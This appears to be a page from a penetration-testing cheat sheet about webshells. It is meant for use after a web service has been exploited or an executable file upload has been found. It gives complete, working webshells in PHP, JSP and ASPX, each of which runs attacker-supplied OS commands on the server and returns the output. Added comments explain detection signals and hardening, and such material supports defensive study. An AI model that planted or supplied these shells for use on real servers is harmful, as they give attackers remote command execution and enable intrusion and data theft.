
WebShells

Use these when you have exploited a web service, or when you have a file upload that lets the uploaded file be executed by the server.

Most of these webshells come from the collection by tennc, linked here.

PHP

  • Simple PHP webshell code

    <?php
            // Hands the request parameter 'variable' to system() unchanged: the value is run
            // as an OS command by the PHP process and the command output is written into the
            // HTTP response. There is no authentication, validation or escaping in this file.
            //
            // Defender notes: a file with this shape inside a web-served directory is an
            // indicator of compromise. Useful controls are listing system() and related
            // functions in php.ini's disable_functions, making upload directories
            // non-executable, file-integrity monitoring on the web root, and alerting when
            // the web server / PHP process spawns a shell or other child process.
            system($_REQUEST['variable']);
    ?>
    

    Info

    $_REQUEST accepts the parameter from either a GET or a POST request. It can be adapted to POST only or GET only if the exploit specifically needs one of them.

JSP

  • Simple JSP webshell code
    <%@ page import="java.util.*,java.io.*"%>
    <HTML><BODY>
    <FORM METHOD="GET" NAME="form1" ACTION="">
    <INPUT TYPE="text" NAME="variable">
    
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    // Single-page JSP: renders the form above and, when the request carries a
    // "variable" parameter, runs its value as an OS command from inside the
    // servlet container's JVM and prints the command's standard output in <pre>.
    // There is no authentication or input validation anywhere in this page.
    //
    // Defender notes:
    //  - The form submits with METHOD="GET", so the submitted value travels in the
    //    query string, which web access logs typically record.
    //  - The command is started by the application server's Java process; a JVM
    //    that serves web traffic spawning child processes is a strong detection signal.
    //  - An unexpected .jsp file in a deployed web application is an indicator of
    //    compromise; keep upload locations outside any path the container compiles
    //    and run the container under a least-privileged account.
    if (request.getParameter("variable") != null) {
            // The raw parameter value goes straight to Runtime.exec().
            Process prc = Runtime.getRuntime().exec(request.getParameter("variable"));
    
            // Standard output of the child process; the error stream is not read here.
            InputStream ins = prc.getInputStream();
    
            // Obtained but never used in this listing.
            OutputStream oss = prc.getOutputStream();
    
            // NOTE(review): DataInputStream.readLine() is a deprecated API.
            DataInputStream datastr = new DataInputStream(ins);
            String str = datastr.readLine();
    
            // The parameter is echoed into the response without HTML encoding, so
            // the page also reflects attacker-controlled markup.
            out.println("Input: " + request.getParameter("variable") + "<BR>");
    
            // Copy the command output to the response line by line until end of stream.
            while ( str != null ) {
                    out.println(str); 
                    str = datastr.readLine(); 
                    }
            }
    %>
    </pre>
    </BODY></HTML>
    

ASPX

  • Simple ASPX webshell code

    <%@ Page Language="C#" Debug="true" Trace="false" %>
    <%@ Import Namespace="System.Diagnostics" %>
    <%@ Import Namespace="System.IO" %>
    
    <script Language="c#" runat="server">
    // Single-page ASP.NET Web Forms listing: a text box and a button whose click
    // handler runs the text box content through cmd.exe on the server and writes
    // the captured standard output back into the response. The page contains no
    // authentication or input validation.
    //
    // Defender notes:
    //  - The form posts back with method="post", so the submitted text is in the
    //    request body rather than the URL; URL-only access logging will not show
    //    it, and process-creation telemetry is the more reliable signal.
    //  - The child process is started by the ASP.NET worker process (w3wp.exe
    //    under IIS); a web worker spawning cmd.exe is a high-fidelity alert.
    //  - An unexpected .aspx file under a site root is an indicator of compromise;
    //    keep upload folders non-executable and run the application pool under a
    //    least-privileged identity.

    // Empty page-load handler; nothing happens until the button is clicked.
    void Page_Load(object sender, EventArgs e)
    {
    }
    // Starts cmd.exe with "/c " followed by the supplied text and returns
    // everything the process writes to standard output.
    string ExAttr(string params)
    {
    ProcessStartInfo procstarti = new ProcessStartInfo();
    // The executable name is assembled from two string literals -- presumably so
    // the literal "cmd.exe" does not appear in the file (assumption; relevant when
    // writing content signatures for this family of pages).
    procstarti.FileName = "cmd"+".exe";
    // Caller-supplied text is concatenated into the argument string as-is.
    procstarti.Arguments = "/c "+params;
    // Output redirection requires UseShellExecute = false.
    procstarti.RedirectStandardOutput = true;
    procstarti.UseShellExecute = false;
    Process proc = Process.Start(procstarti);
    // Only standard output is captured; ReadToEnd() blocks until the stream closes.
    StreamReader strrdr = proc.StandardOutput;
    string str = strrdr.ReadToEnd();
    strrdr.Close();
    return str;
    }
    
    // Click handler wired to the button via OnClick="Args_Click": passes the text
    // box value to ExAttr and writes the HTML-encoded result inside <pre>.
    void Args_Click(object sender, System.EventArgs e)
    {
    Response.Write("<pre>");
    Response.Write(Server.HtmlEncode(ExAttr(text.Text)));
    
    Response.Write("</pre>");
    }
    </script>
    <HTML>
    <HEAD>
    <title>My Little Pony</title>
    </HEAD>
    <body >
    <form id="cmd" method="post" runat="server">
    <asp:TextBox id="text" style="Z-INDEX: 110; LEFT: 400px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
    <asp:Button id="but" style="Z-INDEX: 112; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Args_Click"></asp:Button>
    <asp:Label id="labtext" style="Z-INDEX: 114; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Args:</asp:Label>
    </form>
    </body>
    </HTML>